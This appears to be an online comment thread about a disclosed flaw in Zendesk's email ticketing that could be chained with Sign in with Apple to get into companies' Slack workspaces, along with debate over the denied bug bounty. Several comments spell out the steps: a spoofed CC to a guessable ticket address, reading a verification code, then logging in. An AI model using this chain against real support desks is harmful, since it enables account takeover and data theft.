Tangentially, this does raise one of my big issues with using OAuth2 for single-sign-on though, which is that it really doesn't address the third-party authorization problem well. Ok, you're [email protected], Google has verified that, and example.com is our domain, so we're letting you into our app Foobar. Now what? The scopes you requested were for Google APIs only and have nothing to do with Foobar really. So now we need to implement an authorization system in Foobar that decides what [email protected] can actually do. This part, and how to do it right, gets glossed over (at best!) by discussions on OAuth2. It also gets glossed over by product and security when they want things "SSO-enabled", which means development time doesn't get budgeted for it. Even just using groups to control coarse access levels requires integration with provider-specific APIs. OAuth2 is great for identity and authentication, but far too little attention has been paid to doing authorization right.
Further, IMO, sure it's a bug that one can say they control [email protected]. But IMO the real issue is lousy, permissive authorisation that gives access to anything simply by virtue of controlling a @company.com mail. Surely some HR/tech person, when an employee is being onboarded, should be enabling access to some core systems (probably by adding them to a group), and the default state for an account with no groups should be no access.
In any large enough organisation, IME there's a lot of ways to get a @org.com email, and too many people/systems have the ability to create an email than a single centralised IT team.
But even so, there's another mechanism, which is that when you create an OAuth2-enabled project in Google's console, you can specify that only known users in your domain are allowed to authenticate through it. This would lock out any personal account anyway.
1. Zendesk allows you to add a CC to any existing support ticket by sending a (spoofed) reply from the original requestor's email address to that ticket's Reply-To address and including a CC in the email.
In some circumstances the Reply-To address is based on an auto-incrementing integer so it can be guessed. (Although this may not alway be the case: my email archives show some emails from Zendesk using the integer and other emails using a random alphanumeric string. It seems to vary by company so it might be some sort of configuration setting?)
2. Slack allows third-party domain-wide logins via Sign in with Apple without additional verification that the email belongs to a real person. Here the author of the article pretends to be [email protected] to Slack and Slack lets them into the company.com channel, despite the fact that [email protected] does not actually represent a real user and is only intended to be a receiving email address that forwards into Zendesk. (This sounds more like a configuration problem than anything else though.)
Sign In with Apple is allowing you to "create an account"(author's words) on @company.com, which should not be supported in the firat place. Instead, it should rely in a central directory controlled by company.com for authentication
Zendesk deserve a lot of flack here, especially after they already realized this is real. However, just to empathize a bit: the amount of spam SPF, DKIM, DMARC "security" reports anyone running a service gets is absolutely insane. So it's very easy to accidentally misclassify what this reporter originally discovered as that by accident.
Zendesk gave me a tshirt but not any money for it. C'est la vie.
Huh? I don't think you can read page contents unless the origin matches exactly (scheme://host:port).
So for this to work still, you need to bypass a spam filter.
They should just force DMARC and SPF like Google has done, and say "your fault if you misconfigure". Also default-off for the CC thing would be a good idea, too, with a warning of what could happen if they turn it on. Alternatively making a non-guessable id for the email.
EDIT: they absolutley should not use an autoincrementing int as a "support-chain token" though, that's a workaround they could easily do.
I checked my email archives and some (but not all) of the emails I've received from Zendesk have arbitrary alphanumeric ids in the Reply-To header instead of integers. Seems to depend on the company, perhaps this is a configuration issue?
1. Apple sends a legitimate email with a verification code from [email protected] to [email protected], creating a ticket in Zendesk.
2. The attacker then sends an email to [email protected] from [email protected] (spoofed), attaching their own email address in the CC field.
3. Since the attacker is now CC'ed they can read the entire history of the ticket including the legitimate email Apple sent in (1) containing the verification code.
4. Now that the attacker has verified ownership of the Apple ID with the email address [email protected] they can use that Apple ID to login to any service that grants domain-based access via Sign in With Apple, such as Slack.
Though his pondering of 'why do companies use third party support systems instead of rolling their own' gave his age away :)
What was the planned response for addressing the vulnerability reported through the Bug Bounty program, and how did the plan change after the researcher escalated the issue directly to Zendesk before remediation was completed?
According to the researcher, they only contacted 3rd parties after Zendesk rejected the disclosure as out of scope, as they are free to do.
If this timeline is incorrect, Zendesk should immediately correct the record. As it stands, accusing the researcher of violating ethical principles looks very bad for Zendesk. Perhaps even libelous.
That it affected Slack was a side-effect of the original bug, and not a new, previously undisclosed bug. Zendesk fixed the original bug, after rejecting the disclosure. Given all that, Zendesk is still ethically bound to honor the bounty, 3rd party disclosures notwithstanding.
Are you yourself not at fault for forcing him to violate the terms in order to protect your customers?
2. "they violated key ethical principles by directly contacting third parties about their report prior to remediation", what is a violation of ethical principles is to know about a security failure in your application and ignore it, leaving customers at risk, can't wait for some law to pass so people who behave like that face consequences.
3. "We have no evidence that this vulnerability was exploited by a bad actor.", tldr, it don't fixed it until some vendor dropped us, because before that happened, it was cheaper to ignore it.
This is blatant dishonesty- the post documented in detail that the reward had already been denied, and the issue ignored multiple times before they contacted 3rd parties. That is not an ethical violation but an ethical necessity- after ZenDesk refused to act, they had an ethical responsibility to inform everyone affected.
This alone is a huge red flag that ZenDesk isn't a trustworthy organization, on top of trying to hide rather than correct security issues unless they get bad press.
If I were ZenDesk, I would pay out the bounty to this kid immediately, and release a detailed public apology explaining how the entire bounty review system has been revamped to take things like this much more seriously in the future.
The original is:
”1 bug, $50,000+ in bounties, how Zendesk intentionally left a backdoor in hundreds of Fortune 500 companies”
A better edit might be something like:
“The $50k bug where Zendesk backdoored Fortune 500 companies”
50k corresponds to the money they made with unrelated bug bounties.
I wish they would fix the title so that it properly calls out zendesk refused to pay for a serious bug.
1 bug, 50k:
I don't know why the "1" got dropped.
If you submit "Why I care" it'll decide that you meant 'I care".
If you submit "10 More Secrets in Pokemon" it'll decide you meamt "More Secrets in Pokemon".
Conversely, there's an entire cottage industry focused on writing attention-catching headlines, which results in patterns like what HN mangles.
If it's annoying, OP can edit immediately after submitting to overwrite the mangled title with the correct one.
"SPF, DKIM, and DMARC issues" is absolutely and positively intended to mean "we don't care if we are missing these headers on our domains", in part because this is 99.9% of drive-by beg bounties (if you are tired of getting "I HAVE FOUND A SERIOUS SECURITY ISSUE IN YOUR WEBSITE" cc'ing security@, legal@, privacy@, and your CEO on a monthly cadence, just set up a DKIM record :P)
Yes, this is technically a bug which is in the space of SPF, DKIM, and/or DMARC. But this is absolutely NOT WHAT THE EXCLUSION IS FOR. Hacker One triage teams should know better, and it's frankly embarrassing that they don't. And it's frankly mortifying that their mediation team also didn't pick up on this.
But it checks out.
This is one of the reasons I will not use Hacker One ever. Bugcrowd is slightly better. Intigriti has (so far) been pretty good. I'm not affiliated with any of them, just have been a customer of all three.
I finally stopped when two large companies have stopped communicating with me over the last year (all bugs have been triaged on the H1 side).
They owe me a total of around 30k. H1 can't do anything about it. It seems there is no actual contract in place to protect researchers.
I generally refuse to go through platforms now (also because I really hate being subject to the psychological pressure of a "social credit system", even though I understand why the platforms do it), so if your company doesn't have an alternative reporting form, or refuses bug bounty payouts when a valid issue was reported directly through them instead of through a platform (hello, Backblaze!), I'm not doing free labor for you and you will likely hear about the bug when either someone else finds it or I include it in a public write-up (if it's a bug affecting multiple companies).
You're better off not bothering contacting them.
1. zendesk allows you to add users to a support issue and view the complete issue history by sending a response email to a guessable support email from a person associated with an issue and cc'ing the person to add.
2. Zen desk depends on a spam check for inbound email validity. This check does not appear to catch instances where sender email is spoofed. Zendesk claims this is bdue to DKIM/SPF/DMARC config but I have trouble imagining that 50% of Fortune 500 would get this wrong. There are many automated checks available.
3) Apple issues an Apple ID account to anyone who can receive a verification email Sent to the mailing address ([email protected])
4) Slack allows you to sign in to a workspace using any Apple ID associated with the workspace domain (e.g. [email protected])
This researcher reported #2 to hackerone and was declined. Researcher later discovered full exploit with 3 and 4. Did not update hackerone, contacted affected companies directly.
it would have been prudent to update hackerone on the additional finding, but it feels like an easy oversight for a 15 year old after getting rejected on the first round.
Zendesk should take the higher ground and recognize the mistake and correct it. Not get all "ethical mumbo jumbo."
I'm not 15, but since you ignore(d) me - game over.
Do you find it surprising that they use Microsoft Office too? Paying someone else to handle things like this is cheaper than paying developers and hosting a service like this.
And also that being brilliant doesn’t magically correlate with being knowledgeable.
https://xkcd.com/1053
For some reason this like cracked me up. Sounds exactly like something 15 year old me might say :-).
Let’s build our own ticketing system! How hard could it be?
H1 should restrict ZD from their platform.
It is challenging for Zendesk to enforce or fix DKIM, SPF, and DMARC issues across all client domains so better to just ignore it :grimace:
The irony is that they have the worst support and one of the worst response times to issues reported. You will find many experiences on LinkedIn reporting this.
For a company built on email, they're not good at it.
I thought this was mainly mitigated by invalidating the assumption that “only authorized employees can control a company email” – it used to be common 5-10 years ago to verify “that you’re an employee” that way, but I just assumed that kind of stopped in favor of whatever SSO/SAML stuff that became popular with enterprise.
Is this the same thing? Or a variation?
If you value your time and your health, don't use these platforms. If platforms want security, they can hire people by the hour/day and pay them the relevant wages.
So the hacks put in place to deal with Google SSO hadn’t been put in place for Apple’s.
Also, what Fortune 500 company is leaving slack’s email based login feature enabled? Why wouldn’t they all be using a corporate SSO solution tied to their company’s slack directory?
Also I think this is a good reminder that using sequential IDs for anything public facing is almost always a bad idea (or at the very least something you should think very hard about). It would be pretty easy to make ticket ID, for example, a sequential 5 digit number followed by 4 random alphanumeric characters. Everyone could still easily refer to the ticket number, but it wouldn't be guessable.
Nothing changes for them even if they ignore one report, especially from an unknown researcher.
It exposes pretty sad state of the industry. Who said enterprise?
I.e. you have domain support.example.com, CNAMEd to Zendesk, so you cannot add any other DNS record to it, but Zendesk should do it on their side. But they refuse, and force you to put CAA to your root domain example.com.
https://medium.com/intigriti/how-i-hacked-hundreds-of-compan...
Wait - how is that workflow possible and supported?
In my head, authorization under @company.com would be delegated to a central directory, instead of relying on Apple ID. It is effectively an authentication bypass.
I would add that HackerOne could also take an action and influence in the positive outcome and not being just a MiM.
Why do they even have a bounty program if they do this?
I like this kid
No responsibilities and all the time in the world to learn with the right circumstances, they can go far.
Older devs who are experts in this area are already busy making money and working on their employer's security.
Ah, yes, why do laymen always think this?
I mean, I get it, Krupp and mining towns used to be a thing, so it is possible.
But every big company should build a ticketing system? Why not an email solution, OS, network routers too?
I mean it sounds weird to argue that you won't pay, but do not allow the person to talk about it anyway. Even more so if the person communicated with affected companies instead of some darknet marketplace.
Come on, honor your bug bounty. Especially when it can bite you in the ass hard enough to plummet stock prices if a bug of this caliber is exploited in the companies you serve
That this hurts Zendesk is too bad, it's still the morally correct thing to do and Zendesk probably understands that, too